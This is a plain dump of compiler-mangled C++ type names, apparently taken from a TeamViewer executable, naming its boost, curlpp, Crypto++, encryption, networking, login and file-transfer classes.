.?AU?$weak_fn_and_ptr_data@U?$shared_ptr_mem_fn@P8CWebDownloader@tvgui@@AEXXZXV12@$$$V@detail@tvstd@@Uweak_fn_ignore_void_policy@23@U?$ArgumentStorage@$$$V@23@@detail@tvstd@@
.?AVCWebDownloaderWin@tvgui@@
.?AVRuntimeError@curlpp@@
.?AVUnsetOption@curlpp@@
.?AVLogicError@curlpp@@
.?AVUnknowException@curlpp@@
.?AVCallbackExceptionBase@curlpp@@
.?AVLibcurlRuntimeError@curlpp@@
.PAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@
.?AV?$sp_ms_deleter@VCryptoKeyRSA@tvencrypt@@@detail@boost@@
.?AV?$sp_ms_deleter@VCryptoKeyAES@tvencrypt@@@detail@boost@@
.?AV?$bind_t@XV?$mf3@XVControlCenterIPCImplementation@TeamViewer_ManagedDevice@@AAUTContent@CRCmdAck@tvhelper@@IABUuuid@uuids@boost@@@_mfi@boost@@V?$list4@V?$value@PAVControlCenterIPCImplementation@TeamViewer_ManagedDevice@@@_bi@boost@@U?$arg@$00@3@V?$value@I@23@V?$value@Uuuid@uuids@boost@@@23@@_bi@3@@_bi@boost@@
.?AV?$sp_ms_deleter@VCryptoKeyMAC@tvencrypt@@@detail@boost@@
.?AV?$bind_t@XV?$mf4@XVSecureNetwork@tvencrypt@@ABVBCommand@tvhelper@@IIABV?$shared_ptr@VCRCmdAck@tvhelper@@@boost@@@_mfi@boost@@V?$list5@V?$value@V?$shared_ptr@VSecureNetwork@tvencrypt@@@boost@@@_bi@boost@@U?$arg@$00@3@U?$arg@$01@3@U?$arg@$02@3@U?$arg@$03@3@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf5@XVCGatewaySession@tvnetwork@@V?$shared_ptr@VCryptoKey@tvencrypt@@@boost@@V34@HHV?$shared_ptr@VCSignedAndCryptedSessionKey@tvnetwork@@@4@@_mfi@boost@@V?$list6@V?$value@V?$shared_ptr@VCGatewaySession@tvnetwork@@@boost@@@_bi@boost@@U?$arg@$00@3@U?$arg@$01@3@V?$value@H@23@V?$value@I@23@V?$value@V?$shared_ptr@VCSignedAndCryptedSessionKey@tvnetwork@@@boost@@@23@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf4@XVCGatewaySession@tvnetwork@@V?$shared_ptr@VCryptoKey@tvencrypt@@@boost@@V34@IABV?$function@$$A6AXV?$tuple@IV?$shared_array@E@boost@@Unull_type@tuples@2@U342@U342@U342@U342@U342@U342@U342@@tuples@boost@@@Z@4@@_mfi@boost@@V?$list5@V?$value@V?$shared_ptr@VCGatewaySession@tvnetwork@@@boost@@@_bi@boost@@U?$arg@$00@3@U?$arg@$01@3@V?$value@I@23@V?$value@V?$function@$$A6AXV?$tuple@IV?$shared_array@E@boost@@Unull_type@tuples@2@U342@U342@U342@U342@U342@U342@U342@@tuples@boost@@@Z@boost@@@23@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XP6AXABV?$shared_ptr@VCryptoKey@tvencrypt@@@boost@@0ABV?$function@$$A6AXV?$shared_ptr@VCryptoKey@tvencrypt@@@boost@@0@Z@2@ABV?$shared_ptr@VSecureNetwork@tvencrypt@@@2@@ZV?$list4@U?$arg@$00@boost@@V?$value@V?$shared_ptr@VCryptoKey@tvencrypt@@@boost@@@_bi@2@V?$value@V?$function@$$A6AXV?$shared_ptr@VCryptoKey@tvencrypt@@@boost@@0@Z@boost@@@42@V?$value@V?$shared_ptr@VSecureNetwork@tvencrypt@@@boost@@@42@@_bi@2@@_bi@boost@@
.?AV?$bind_t@XP6AXABV?$shared_ptr@VCryptoKey@tvencrypt@@@boost@@ABV?$function@$$A6AXV?$shared_ptr@VCryptoKey@tvencrypt@@@boost@@0@Z@2@ABV?$shared_ptr@VSecureNetwork@tvencrypt@@@2@@ZV?$list3@U?$arg@$00@boost@@V?$value@V?$function@$$A6AXV?$shared_ptr@VCryptoKey@tvencrypt@@@boost@@0@Z@boost@@@_bi@2@V?$value@V?$shared_ptr@VSecureNetwork@tvencrypt@@@boost@@@42@@_bi@2@@_bi@boost@@
.?AV?$bind_t@XV?$mf4@XVCConnectionThread@tvnetwork@@AAVCCommand@tvhelper@@IIV?$shared_ptr@VCRCmdAck@tvhelper@@@boost@@@_mfi@boost@@V?$list5@V?$value@PAVCConnectionThread@tvnetwork@@@_bi@boost@@U?$arg@$00@3@U?$arg@$01@3@U?$arg@$02@3@U?$arg@$03@3@@_bi@3@@_bi@boost@@
.?AV?$sp_ms_deleter@VCSendBufferFactoryCCmdV1@tvdyngate@@@detail@boost@@
.?AV?$sp_ms_deleter@VCCmd2Control@tvdyngate@@@detail@boost@@
.?AV?$bind_t@XP6AXV?$weak_ptr@VInstantSupportCommandHandler@tvnetwork@@@boost@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@_N@ZV?$list3@V?$value@V?$weak_ptr@VInstantSupportCommandHandler@tvnetwork@@@boost@@@_bi@boost@@U?$arg@$00@3@U?$arg@$01@3@@_bi@2@@_bi@boost@@
.?AV?$bind_t@XP6AXV?$weak_ptr@VInstantSupportCommandHandler@tvnetwork@@@boost@@USecureNetworkData@tvencrypt@@@ZV?$list2@V?$value@V?$weak_ptr@VInstantSupportCommandHandler@tvnetwork@@@boost@@@_bi@boost@@U?$arg@$00@3@@_bi@2@@_bi@boost@@
.?AV?$sp_ms_deleter@VCSendBufferFactoryCCmdV2@tvdyngate@@@detail@boost@@
.?AV?$bind_t@W4RetCode@tvdyngate@@V?$mf0@W4RetCode@tvdyngate@@VCConnectionThreadUDP@tvnetwork@@@_mfi@boost@@V?$list1@V?$value@V?$shared_ptr@VCConnectionThreadUDP@tvnetwork@@@boost@@@_bi@boost@@@_bi@5@@_bi@boost@@
.?AV?$bind_t@XV?$mf1@XVCConnectionThreadUDP@tvnetwork@@W4RetCode@tvdyngate@@@_mfi@boost@@V?$list2@V?$value@V?$shared_ptr@VCConnectionThreadUDP@tvnetwork@@@boost@@@_bi@boost@@U?$arg@$00@3@@_bi@3@@_bi@boost@@
.?AV?$bind_t@W4RetCode@tvdyngate@@V?$mf1@W4RetCode@tvdyngate@@VCConnectionThreadUDP@tvnetwork@@UtUDPFlowcontrol@tvhelper@@@_mfi@boost@@V?$list2@V?$value@V?$shared_ptr@VCConnectionThreadUDP@tvnetwork@@@boost@@@_bi@boost@@V?$value@UtUDPFlowcontrol@tvhelper@@@23@@_bi@5@@_bi@boost@@
.?AV?$bind_t@W4RetCode@tvdyngate@@V?$mf1@W4RetCode@tvdyngate@@VCConnectionThreadUDP@tvnetwork@@VCCommand@tvhelper@@@_mfi@boost@@V?$list2@V?$value@V?$shared_ptr@VCConnectionThreadUDP@tvnetwork@@@boost@@@_bi@boost@@V?$value@VCCommand@tvhelper@@@23@@_bi@5@@_bi@boost@@
.?AV?$sp_ms_deleter@VCUDPFirewallConsideration@tvnetwork@@@detail@boost@@
.?AV?$sp_ms_deleter@VCSendBufferFactoryUDP@tvdyngate@@@detail@boost@@
.?AV?$bind_t@XV?$mf1@XVCConnectionThreadUDP@tvnetwork@@_N@_mfi@boost@@V?$list2@V?$value@V?$shared_ptr@VCConnectionThreadUDP@tvnetwork@@@boost@@@_bi@boost@@U?$arg@$00@3@@_bi@3@@_bi@boost@@
.?AV?$bind_t@W4RetCode@tvdyngate@@V?$mf4@W4RetCode@tvdyngate@@VCConnectionThreadUDP@tvnetwork@@EPBDGW4GWPriority@BCommand@tvhelper@@@_mfi@boost@@V?$list5@V?$value@V?$shared_ptr@VCConnectionThreadUDP@tvnetwork@@@boost@@@_bi@boost@@V?$value@H@23@V?$value@PBD@23@V423@V?$value@W4GWPriority@BCommand@tvhelper@@@23@@_bi@5@@_bi@boost@@
.?AV?$bind_t@XV?$mf0@XVCConnectionThreadUDP@tvnetwork@@@_mfi@boost@@V?$list1@V?$value@V?$shared_ptr@VCConnectionThreadUDP@tvnetwork@@@boost@@@_bi@boost@@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf1@XVCCreateMeetingSession@tvnetwork@@V?$shared_ptr@VCryptoKey@tvencrypt@@@boost@@@_mfi@boost@@V?$list2@V?$value@V?$shared_ptr@VCCreateMeetingSession@tvnetwork@@@boost@@@_bi@boost@@U?$arg@$00@3@@_bi@3@@_bi@boost@@
.?AV?$sp_ms_deleter@VCPriorizedCommandUDPDataFactory@tvnetwork@@@detail@boost@@
.?AV?$bind_t@XV?$mf2@XVCUDPFirewallConsideration@tvnetwork@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@_N@_mfi@boost@@V?$list3@V?$value@PAVCUDPFirewallConsideration@tvnetwork@@@_bi@boost@@U?$arg@$00@3@U?$arg@$01@3@@_bi@3@@_bi@boost@@
.?AVCCmdDataStreamException@tvhelper@@
.?AUCUDPSendCacheException@tvdyngate@@
.?AV?$bind_t@XV?$mf1@XVNegotiateEncryptionV2@tvnetwork@@AAUTContent@CRCmdAck@tvhelper@@@_mfi@boost@@V?$list2@V?$value@V?$shared_ptr@VNegotiateEncryptionV2@tvnetwork@@@boost@@@_bi@boost@@U?$arg@$00@3@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf2@XVCLoginServer@tvshared@@ABVBCommand@tvhelper@@W4ECallbackResult@CBCommandCallback@tvclientbase@@@_mfi@boost@@V?$list3@V?$value@V?$shared_ptr@VCLoginServer@tvshared@@@boost@@@_bi@boost@@U?$arg@$00@3@U?$arg@$01@3@@_bi@3@@_bi@boost@@
.?AV?$bind_t@_NV?$mf1@_NVCLoginServer@tvshared@@W4ConnectionWarningAuthType@IBuddy@tvhelper@@@_mfi@boost@@V?$list2@V?$value@V?$shared_ptr@VCLoginServer@tvshared@@@boost@@@_bi@boost@@U?$arg@$00@3@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf0@XVIRunServer@tvshared@@@_mfi@boost@@V?$list1@V?$value@PAVLoginServerBase@tvshared@@@_bi@boost@@@_bi@3@@_bi@boost@@
.?AV?$sp_ms_deleter@VAccountLogin@Detail@tvguibackend@@@detail@boost@@
.?AV?$sp_ms_deleter@ULoginResult@Account@tvguibackend@@@detail@boost@@
.?AV?$sp_ms_deleter@VLoginKey@Detail@tvguibackend@@@detail@boost@@
.?AV?$bind_t@Uunspecified@_bi@boost@@U?$weak_fn_and_ptr_data@U?$shared_ptr_mem_fn@P8AccountLogin@Detail@tvguibackend@@AEXABVErrorCode@3@@ZXV123@ABV43@@detail@tvstd@@Uweak_fn_ignore_void_policy@23@U?$ArgumentStorage@ABVErrorCode@tvguibackend@@@23@@detail@tvstd@@V?$list1@V?$value@VErrorCode@tvguibackend@@@_bi@boost@@@23@@_bi@boost@@
.?AV?$bind_t@Uunspecified@_bi@boost@@U?$weak_fn_and_ptr_data@U?$shared_ptr_mem_fn@P8AccountLogin@Detail@tvguibackend@@AEXH_N@ZXV123@H_N@detail@tvstd@@Uweak_fn_ignore_void_policy@23@U?$ArgumentStorage@H_N@23@@detail@tvstd@@V?$list2@U?$arg@$00@boost@@U?$arg@$01@2@@23@@_bi@boost@@
.?AV?$bind_t@Uunspecified@_bi@boost@@U?$weak_fn_and_ptr_data@U?$shared_ptr_mem_fn@P8AccountLogin@Detail@tvguibackend@@AEXABV?$shared_ptr@VBCommand@tvhelper@@@boost@@@ZXV123@ABV45@@detail@tvstd@@Uweak_fn_ignore_void_policy@23@U?$ArgumentStorage@ABV?$shared_ptr@VBCommand@tvhelper@@@boost@@@23@@detail@tvstd@@V?$list1@U?$arg@$00@boost@@@23@@_bi@boost@@
.?AV?$bind_t@Uunspecified@_bi@boost@@U?$weak_fn_and_ptr_data@U?$shared_ptr_mem_fn@P8AccountLogin@Detail@tvguibackend@@AEXABV?$shared_ptr@VBCommand@tvhelper@@@boost@@ABVErrorCode@3@@ZXV123@ABV45@ABV63@@detail@tvstd@@Uweak_fn_ignore_void_policy@23@U?$ArgumentStorage@ABV?$shared_ptr@VBCommand@tvhelper@@@boost@@ABVErrorCode@tvguibackend@@@23@@detail@tvstd@@V?$list2@U?$arg@$00@boost@@U?$arg@$01@2@@23@@_bi@boost@@
.?AV?$bind_t@XV?$mf2@XVCSendFileModule_Server@tvremotesupport@@ABV?$vector@IV?$allocator@I@std@@@std@@ABU?$pair@W4ReceiveFilesChoice@ISendFileModuleUIReceiver@tvremotesupport@@_N@4@@_mfi@boost@@V?$list3@V?$value@V?$shared_ptr@VCSendFileModule_Server@tvremotesupport@@@boost@@@_bi@boost@@V?$value@V?$vector@IV?$allocator@I@std@@@std@@@23@U?$arg@$00@3@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf2@XVCSendFileModule_Server@tvremotesupport@@ABV?$vector@IV?$allocator@I@std@@@std@@V?$function@$$A6AXABU?$pair@W4ConflictResolutionChoice@ISendFileModuleUIReceiver@tvremotesupport@@_N@std@@@Z@boost@@@_mfi@boost@@V?$list3@V?$value@V?$shared_ptr@VCSendFileModule_Server@tvremotesupport@@@boost@@@_bi@boost@@V?$value@V?$vector@IV?$allocator@I@std@@@std@@@23@V?$value@V?$function@$$A6AXABU?$pair@W4ConflictResolutionChoice@ISendFileModuleUIReceiver@tvremotesupport@@_N@std@@@Z@boost@@@23@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf2@XVCSendFileModule_Server@tvremotesupport@@ABV?$vector@IV?$allocator@I@std@@@std@@V?$function@$$A6AXABU?$pair@W4ReceiveFilesChoice@ISendFileModuleUIReceiver@tvremotesupport@@_N@std@@@Z@boost@@@_mfi@boost@@V?$list3@V?$value@V?$shared_ptr@VCSendFileModule_Server@tvremotesupport@@@boost@@@_bi@boost@@V?$value@V?$vector@IV?$allocator@I@std@@@std@@@23@V?$value@V?$function@$$A6AXABU?$pair@W4ReceiveFilesChoice@ISendFileModuleUIReceiver@tvremotesupport@@_N@std@@@Z@boost@@@23@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf4@XVCSendFileModule_Server@tvremotesupport@@ABV?$vector@IV?$allocator@I@std@@@std@@ABV34@IABU?$pair@W4ConflictResolutionChoice@ISendFileModuleUIReceiver@tvremotesupport@@_N@4@@_mfi@boost@@V?$list5@V?$value@V?$shared_ptr@VCSendFileModule_Server@tvremotesupport@@@boost@@@_bi@boost@@V?$value@V?$vector@IV?$allocator@I@std@@@std@@@23@V423@V?$value@I@23@U?$arg@$00@3@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf1@XVCSendFileModule_Base@tvremotesupport@@_N@_mfi@boost@@V?$list2@V?$value@V?$shared_ptr@VCSendFileModule_Base@tvremotesupport@@@boost@@@_bi@boost@@V?$value@_N@23@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf0@XVCSendFileModule_Base@tvremotesupport@@@_mfi@boost@@V?$list1@V?$value@V?$shared_ptr@VCSendFileModule_Base@tvremotesupport@@@boost@@@_bi@boost@@@_bi@3@@_bi@boost@@
.?AV?$bind_t@IV?$mf1@IVCSendFileModule_Base@tvremotesupport@@ABVLegacyFileEventObject@tvdatatransceiver@@@_mfi@boost@@V?$list2@V?$value@V?$shared_ptr@VCSendFileModule_Base@tvremotesupport@@@boost@@@_bi@boost@@U?$arg@$00@3@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf0@XVCRemoteSupportSession@tvremotesupport@@@_mfi@boost@@V?$list1@V?$value@PAVCSessionIncomingRemoteSupport@tvremotesupport@@@_bi@boost@@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf3@XVCRemoteSupportSession@tvremotesupport@@ABUDataStream@tvhelper@@ABUParticipantIdentifier@4@_N@_mfi@boost@@V?$list4@V?$value@PAVCRemoteSupportSession@tvremotesupport@@@_bi@boost@@U?$arg@$00@3@U?$arg@$01@3@U?$arg@$02@3@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf1@XVCRemoteSupportSession@tvremotesupport@@ABUDataStream@tvhelper@@@_mfi@boost@@V?$list2@V?$value@PAVCRemoteSupportSession@tvremotesupport@@@_bi@boost@@U?$arg@$00@3@@_bi@3@@_bi@boost@@
.?AV?$bind_t@Uunspecified@_bi@boost@@V?$mf0@XVCRemoteSupportSession@tvremotesupport@@@_mfi@3@V?$list1@V?$value@V?$shared_ptr@VCRemoteSupportSession@tvremotesupport@@@boost@@@_bi@boost@@@23@@_bi@boost@@
.?AV?$bind_t@XV?$mf2@XVCRemoteSupportSession@tvremotesupport@@ABVBCommand@tvhelper@@W4ECallbackResult@CBCommandCallback@tvclientbase@@@_mfi@boost@@V?$list3@V?$value@V?$shared_ptr@VCRemoteSupportSession@tvremotesupport@@@boost@@@_bi@boost@@U?$arg@$00@3@U?$arg@$01@3@@_bi@3@@_bi@boost@@
.?AV?$bind_t@_NV?$cmf0@_NVAutoDownloadFileInfo@tvremotesupport@@@_mfi@boost@@V?$list1@U?$arg@$00@boost@@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf1@XVAutoDownloadFileInfo@tvremotesupport@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@_mfi@boost@@V?$list2@U?$arg@$00@boost@@V?$value@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@_bi@2@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf0@XVAutoDownloadFileInfo@tvremotesupport@@@_mfi@boost@@V?$list1@U?$arg@$00@boost@@@_bi@3@@_bi@boost@@
.?AV?$bind_t@_NUlogical_not@_bi@boost@@V?$list1@V?$bind_t@_NV?$cmf0@_NVAutoDownloadFileInfo@tvremotesupport@@@_mfi@boost@@V?$list1@U?$arg@$00@boost@@@_bi@3@@_bi@boost@@@23@@_bi@boost@@
.?AV?$bind_t@XV?$mf1@XVCAutoDownloadManager@tvremotesupport@@I@_mfi@boost@@V?$list2@V?$value@PAVCAutoDownloadManager@tvremotesupport@@@_bi@boost@@U?$arg@$00@3@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf1@XVAutoDownloadFileInfo@tvremotesupport@@I@_mfi@boost@@V?$list2@U?$arg@$00@boost@@V?$value@I@_bi@2@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf3@XVCAutoDownloadManager@tvremotesupport@@IABVLegacyFileLoad@tvdatatransceiver@@AAVAutoDownloadFileInfo@2@@_mfi@boost@@V?$list4@V?$value@PAVCAutoDownloadManager@tvremotesupport@@@_bi@boost@@V?$value@I@23@V?$value@VLegacyFileLoad@tvdatatransceiver@@@23@U?$arg@$00@3@@_bi@3@@_bi@boost@@
.?AV?$bind_t@Uunspecified@_bi@boost@@U?$weak_fn_and_ptr_data@U?$shared_ptr_mem_fn@P8HttpDownload@tvasiolib@@AEXXZXV12@$$$V@detail@tvstd@@Uweak_fn_ignore_void_policy@23@U?$ArgumentStorage@$$$V@23@@detail@tvstd@@Vlist0@23@@_bi@boost@@
.?AU?$weak_fn_and_ptr_data@U?$shared_ptr_mem_fn@P8HttpDownload@tvasiolib@@AEXVconst_buffer@asio@boost@@@ZXV12@V345@@detail@tvstd@@Uweak_fn_ignore_void_policy@23@U?$ArgumentStorage@Vconst_buffer@asio@boost@@@23@@detail@tvstd@@
.P6AXPAVHttpClientImpl@tvasiolib@@@Z
.P6AXPAVHttpRequestImpl@tvasiolib@@@Z
.?AV?$sp_ms_deleter@V?$unique_ptr@UHttpRequestImplParameters@tvasiolib@@U?$default_delete@UHttpRequestImplParameters@tvasiolib@@@std@@@std@@@detail@boost@@
.?AV?$typeid_wrapper@V?$stream_socket_service@Vtcp@ip@asio@boost@@@asio@boost@@@detail@asio@boost@@
.P6AXPAVCurlMultiShared@tvasiolib@@@Z
.?AVOptionBase@curlpp@@
.?AV?$OptionTrait@PAV?$basic_ostream@DU?$char_traits@D@std@@@std@@$0CHBB@@curlpp@@
.?AVEasy@curlpp@@
.?AV?$Option@PAV?$basic_ostream@DU?$char_traits@D@std@@@std@@@curlpp@@
.?AU?$FunctorImpl@HU?$TypeList@W4curl_infotype@@U?$TypeList@PADU?$TypeList@IUNullType@utilspp@@@tl@utilspp@@@tl@utilspp@@@tl@utilspp@@@utilspp@@
.?AVOptionList@internal@curlpp@@
.?AV?$CallbackException@VUnknowException@curlpp@@@curlpp@@
.PAVCallbackExceptionBase@curlpp@@
.?AVCurlHandle@internal@curlpp@@
.?AV?$CallbackException@VLogicError@curlpp@@@curlpp@@
.?AVFile@FormParts@curlpp@@
.?AVContent@FormParts@curlpp@@
.?AVFormPart@curlpp@@
.?AUNoChannelSupport@BufferedTransformation@CryptoPP@@
.?AVInvalidKeyLength@CryptoPP@@
.PBVPrimeSelector@CryptoPP@@
.?AV?$ASN1CryptoMaterial@VPrivateKey@CryptoPP@@@CryptoPP@@
.?AVX509PublicKey@CryptoPP@@
.?AVPKCS8PrivateKey@CryptoPP@@
.?AV?$ASN1CryptoMaterial@VPublicKey@CryptoPP@@@CryptoPP@@
.?AVPrivateKeyAlgorithm@CryptoPP@@
.?AVPrivateKey@CryptoPP@@
.?AVPublicKey@CryptoPP@@
.?AVPublicKeyAlgorithm@CryptoPP@@
.?AVKeyTooShort@PK_SignatureScheme@CryptoPP@@
.?AVInvalidKeyLength@PK_SignatureScheme@CryptoPP@@
.?AV?$AlgorithmImpl@V?$SimpleKeyingInterfaceImpl@V?$TwoBases@VBlockCipher@CryptoPP@@URijndael_Info@2@@CryptoPP@@V12@@CryptoPP@@V12@@CryptoPP@@
.?AV?$SimpleKeyingInterfaceImpl@V?$TwoBases@VBlockCipher@CryptoPP@@URijndael_Info@2@@CryptoPP@@V12@@CryptoPP@@
.?AV?$VariableKeyLength@$0BA@$0BA@$0CA@$07$03$0A@@CryptoPP@@
.?AVSimpleKeyingInterface@CryptoPP@@
.?AV?$AlgorithmImpl@V?$SimpleKeyingInterfaceImpl@VHMAC_Base@CryptoPP@@V?$HMAC@VSHA1@CryptoPP@@@2@@CryptoPP@@V?$HMAC@VSHA1@CryptoPP@@@2@@CryptoPP@@
.?AV?$SimpleKeyingInterfaceImpl@VHMAC_Base@CryptoPP@@V?$HMAC@VSHA1@CryptoPP@@@2@@CryptoPP@@
.?AV?$VariableKeyLength@$0BA@$0A@$0HPPPPPPP@$00$03$0A@@CryptoPP@@
.?AV?$typeid_wrapper@V?$socket_acceptor_service@Vtcp@ip@asio@boost@@@asio@boost@@@detail@asio@boost@@
.?AV?$bind_t@XV?$mf4@XVCRoutedCmdHandler@tvhelper@@ABVBCommand@2@IIV?$shared_ptr@VCRCmdAck@tvhelper@@@boost@@@_mfi@boost@@V?$list5@V?$value@PAVCRoutedCmdHandler@tvhelper@@@_bi@boost@@U?$arg@$00@3@U?$arg@$01@3@U?$arg@$02@3@U?$arg@$03@3@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf4@XVCRoutedCmdHandler@tvhelper@@AAUTContent@CRCmdAck@2@III@_mfi@boost@@V?$list5@V?$value@V?$shared_ptr@VCRoutedCmdHandler@tvhelper@@@boost@@@_bi@boost@@U?$arg@$00@3@V?$value@I@23@V523@V523@@_bi@3@@_bi@boost@@
.?AV?$sp_ms_deleter@UAckMapEntry@RCmdAckMap@tvhelper@@@detail@boost@@
.?AV?$bind_t@XP6AXABV?$function@$$A6AXABVerror_code@system@boost@@ABVBCommand@tvhelper@@@Z@boost@@W4AckResult@tvrcmd@@IABV?$tuple@IV?$shared_array@E@boost@@Unull_type@tuples@2@U342@U342@U342@U342@U342@U342@U342@@tuples@2@@ZV?$list4@V?$value@V?$function@$$A6AXABVerror_code@system@boost@@ABVBCommand@tvhelper@@@Z@boost@@@_bi@boost@@U?$arg@$00@3@U?$arg@$01@3@U?$arg@$02@3@@_bi@2@@_bi@boost@@
.?AV?$sp_ms_deleter@VPunchingPortListener@tvdyngate@@@detail@boost@@
.?AV?$sp_ms_deleter@VCCmd2SendCache@tvdyngate@@@detail@boost@@
.?AV?$typeid_wrapper@V?$datagram_socket_service@Vudp@ip@asio@boost@@@asio@boost@@@detail@asio@boost@@
.?AV?$bind_t@XV?$mf1@XVSecureNetwork@tvencrypt@@ABV?$function@$$A6AXABUCertificateData@tvencrypt@@ABV?$tuple@IV?$shared_array@E@boost@@Unull_type@tuples@2@U342@U342@U342@U342@U342@U342@U342@@tuples@boost@@ABVCertificate@2@@Z@boost@@@_mfi@boost@@V?$list2@V?$value@V?$shared_ptr@VSecureNetwork@tvencrypt@@@boost@@@_bi@boost@@V?$value@V?$function@$$A6AXABUCertificateData@tvencrypt@@ABV?$tuple@IV?$shared_array@E@boost@@Unull_type@tuples@2@U342@U342@U342@U342@U342@U342@U342@@tuples@boost@@ABVCertificate@2@@Z@boost@@@23@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf3@XVSecureNetwork@tvencrypt@@ABVptime@posix_time@boost@@ABV?$function@$$A6AXABUCertificateData@tvencrypt@@ABV?$tuple@IV?$shared_array@E@boost@@Unull_type@tuples@2@U342@U342@U342@U342@U342@U342@U342@@tuples@boost@@ABVCertificate@2@@Z@5@_N@_mfi@boost@@V?$list4@V?$value@V?$shared_ptr@VSecureNetwork@tvencrypt@@@boost@@@_bi@boost@@U?$arg@$00@3@V?$value@V?$function@$$A6AXABUCertificateData@tvencrypt@@ABV?$tuple@IV?$shared_array@E@boost@@Unull_type@tuples@2@U342@U342@U342@U342@U342@U342@U342@@tuples@boost@@ABVCertificate@2@@Z@boost@@@23@V?$value@_N@23@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf2@XVSecureNetwork@tvencrypt@@ABV?$function@$$A6AXABUCertificateData@tvencrypt@@ABV?$tuple@IV?$shared_array@E@boost@@Unull_type@tuples@2@U342@U342@U342@U342@U342@U342@U342@@tuples@boost@@ABVCertificate@2@@Z@boost@@_N@_mfi@boost@@V?$list3@V?$value@V?$shared_ptr@VSecureNetwork@tvencrypt@@@boost@@@_bi@boost@@V?$value@V?$function@$$A6AXABUCertificateData@tvencrypt@@ABV?$tuple@IV?$shared_array@E@boost@@Unull_type@tuples@2@U342@U342@U342@U342@U342@U342@U342@@tuples@boost@@ABVCertificate@2@@Z@boost@@@23@U?$arg@$00@3@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XP6AXABV?$function@$$A6AXABV?$shared_ptr@VCryptoKey@tvencrypt@@@boost@@@Z@boost@@ABVCertificate@tvencrypt@@@ZV?$list2@V?$value@V?$function@$$A6AXABV?$shared_ptr@VCryptoKey@tvencrypt@@@boost@@@Z@boost@@@_bi@boost@@U?$arg@$00@3@@_bi@2@@_bi@boost@@
.?AV?$bind_t@XV?$mf4@XVSecureNetwork@tvencrypt@@ABUCertificateData@2@ABV?$tuple@IV?$shared_array@E@boost@@Unull_type@tuples@2@U342@U342@U342@U342@U342@U342@U342@@tuples@boost@@ABVCertificate@2@ABV?$function@$$A6AXABV?$shared_ptr@VCryptoKey@tvencrypt@@@boost@@@Z@6@@_mfi@boost@@V?$list5@V?$value@V?$shared_ptr@VSecureNetwork@tvencrypt@@@boost@@@_bi@boost@@U?$arg@$00@3@U?$arg@$01@3@U?$arg@$02@3@V?$value@V?$function@$$A6AXABV?$shared_ptr@VCryptoKey@tvencrypt@@@boost@@@Z@boost@@@23@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XP6AXABVerror_code@system@boost@@ABVBCommand@tvhelper@@ABV?$shared_ptr@VSecureNetworkRequest@tvencrypt@@@3@ABV?$shared_ptr@VCryptoKey@tvencrypt@@@3@ABV?$shared_ptr@VSecureNetwork@tvencrypt@@@3@IABV?$vector@IV?$allocator@I@std@@@std@@_N@ZV?$list8@U?$arg@$00@boost@@U?$arg@$01@2@V?$value@V?$shared_ptr@VSecureNetworkRequest@tvencrypt@@@boost@@@_bi@2@V?$value@V?$shared_ptr@VCryptoKey@tvencrypt@@@boost@@@52@V?$value@V?$shared_ptr@VSecureNetwork@tvencrypt@@@boost@@@52@V?$value@I@52@V?$value@V?$vector@IV?$allocator@I@std@@@std@@@52@V?$value@_N@52@@_bi@3@@_bi@boost@@
.?AV?$sp_ms_deleter@VCertificateValidatorCA@tvencrypt@@@detail@boost@@
.?AV?$bind_t@XP6AXABV?$function@$$A6AXABVCertificate@tvencrypt@@@Z@boost@@ABV?$shared_ptr@VSecureNetwork@tvencrypt@@@2@ABVerror_code@system@2@ABVBCommand@tvhelper@@@ZV?$list4@V?$value@V?$function@$$A6AXABVCertificate@tvencrypt@@@Z@boost@@@_bi@boost@@V?$value@V?$shared_ptr@VSecureNetwork@tvencrypt@@@boost@@@23@U?$arg@$00@3@U?$arg@$01@3@@_bi@2@@_bi@boost@@
.?AV?$sp_ms_deleter@VCertificateValidatorMachine@tvencrypt@@@detail@boost@@
.?AVCertificateException@tvencrypt@@
.?AV?$bind_t@XV?$mf5@XVSecureNetworkConnection@tvencrypt@@ABVBCommand@tvhelper@@ABV?$shared_ptr@VSecureNetwork@tvencrypt@@@boost@@Vptime@posix_time@6@ABV?$tuple@IV?$shared_array@E@boost@@Unull_type@tuples@2@U342@U342@U342@U342@U342@U342@U342@@tuples@6@ABV?$shared_ptr@VCRCmdAck@tvhelper@@@6@@_mfi@boost@@V?$list6@V?$value@V?$shared_ptr@VSecureNetworkConnection@tvencrypt@@@boost@@@_bi@boost@@V?$value@VBCommand@tvhelper@@@23@V?$value@V?$shared_ptr@VSecureNetwork@tvencrypt@@@boost@@@23@U?$arg@$00@3@U?$arg@$01@3@V?$value@V?$shared_ptr@VCRCmdAck@tvhelper@@@boost@@@23@@_bi@3@@_bi@boost@@
